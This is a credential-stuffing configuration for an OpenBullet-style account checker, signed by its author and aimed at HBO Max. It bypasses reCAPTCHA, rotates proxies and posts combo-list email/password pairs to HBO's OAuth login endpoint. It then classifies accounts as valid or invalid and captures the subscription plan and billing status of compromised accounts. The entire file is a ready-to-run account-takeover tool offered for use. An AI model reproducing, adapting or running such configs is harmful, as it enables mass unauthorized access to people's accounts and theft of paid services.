[SETTINGS]
{
  "Name": "HBOMAXX",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-22T17:36:24.8745447+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [
    "RecaptchaV3Bypass"
  ],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "HBOMAXX",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
RecaptchaV3Bypass "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LeMrv8ZAAAAAIcvo5HKvdj1lxtUdHnS13jUCulQ&co=aHR0cHM6Ly9wbGF5Lmhib21heC5jb206NDQz&hl=en&v=VZKEDW9wslPbEc9RmzMqaOAP&size=invisible&cb=ub58enakgkgj" "" "https://www.google.com/recaptcha/enterprise/reload?k=6LeMrv8ZAAAAAIcvo5HKvdj1lxtUdHnS13jUCulQ" -> VAR "SOLUTION" 
  

#UA FUNCTION GetRandomUA BROWSER IOS -> VAR "UA" 

#get REQUEST POST "https://oauth.api.hbo.com/auth/tokens" 
  CONTENT "{\"client_id\":\"7161aff6-188a-4718-8d35-69c6ae58884f\",\"client_secret\":\"7161aff6-188a-4718-8d35-69c6ae58884f\",\"scope\":\"browse video_playback_free account_registration\",\"grant_type\":\"client_credentials\",\"deviceSerialNumber\":\"<guid>\",\"clientDeviceData\":{\"paymentProviderCode\":\"google-play\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/vnd.hbo.v9.full+json" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Accept-Language: en-us" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Content-Length: 316" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: oauth.api.hbo.com" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PQ2A.190405.003)" 
  HEADER "X-B3-TraceId: <2>-<3>" 
  HEADER "X-Hbo-Client-Version: Hadron/50.55.0.182 android/50.55.0.182 (Pixel 2/9)" 
  HEADER "X-Hbo-Device-Name: android" 
  HEADER "X-Hbo-Device-Os-Version: 9" 

#Token PARSE "<SOURCE>" JSON "access_token" -> VAR "tk" 

#1 FUNCTION GenerateGUID -> VAR "2" 

#2 FUNCTION GenerateGUID -> VAR "3" 

#3 FUNCTION GenerateGUID -> VAR "guid" 

#post REQUEST POST "https://oauth-us.api.hbo.com/auth/tokens" 
  CONTENT "{\"grant_type\":\"user_name_password\",\"scope\":\"browse video_playback device elevated_account_management\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/vnd.hbo.v9.full+json" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Accept-Language: en-us" 
  HEADER "Authorization: Bearer <tk>" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Host: oauth-us.api.hbo.com" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PQ2A.190405.003)" 
  HEADER "X-B3-TraceId: <2>-<3>" 
  HEADER "X-Hbo-Client-Version: Hadron/50.55.0.182 android/50.55.0.182 (Pixel 2/9)" 
  HEADER "X-Hbo-Device-Name: android" 
  HEADER "X-Hbo-Device-Os-Version: 9" 
  HEADER "x-hbo-headwaiter: entitlements <tk>" 

#HITS_AND_FAILS KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The email address or password is incorrect" 
  KEYCHAIN Success OR 
    KEY "access_token" 
    KEY "HBO Max is available only in the United States and certain US territories" 

#tkk PARSE "<SOURCE>" LR "{\"access_token\":\"" "\",\"" -> VAR "tkk" 

REQUEST POST "https://comet.api.hbo.com/content" 
  CONTENT "[{\"id\":\"urn:hbo:billing-status:mine\"}]" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/vnd.hbo.v9.full+json" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Accept-Language: en-us" 
  HEADER "Authorization: Bearer <tkk>" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: comet.api.hbo.com" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PPR1.180610.009)" 
  HEADER "X-B3-TraceId: <2>-<3>" 
  HEADER "x-hbo-brownie: sessionContext=We3IsMl7BGvmXv%2BcaTWp1Q%3D%3D.JQ05x9F0XJN6%2B%2BwnJvxbJOyfj5bRyI4OmsalZsQrDKQxeHjob5ewp82k4OhQ9z4cwTDPivniC2OIl70TVAUh7iIjdyDS145vHeFgi13FLUIrSo7VW3xtqr5w3h3gTDqxx6nmEzjLRgGZKef7iQu1tQ%3D%3D" 
  HEADER "X-Hbo-Client-Version: Hadron/50.55.0.182 android/50.55.0.182 (Pixel 2/9)" 
  HEADER "X-Hbo-Device-Name: android" 
  HEADER "X-Hbo-Device-Os-Version: 9" 

#billingInformationMessage PARSE "<SOURCE>" JSON "billingInformationMessage" CreateEmpty=FALSE -> CAP "billingInformationMessage" 

#Plan PARSE "<SOURCE>" JSON "Plan" CreateEmpty=FALSE -> CAP "Plan" 

#FREE KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "expired on" 
    KEY "You’re not subscribed to HBO Max" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "expired on" 
    KEY "<SOURCE>" DoesNotContain "You’re not subscribed to HBO Max" 

FUNCTION Constant "@uzzzul" -> CAP "Config By" 

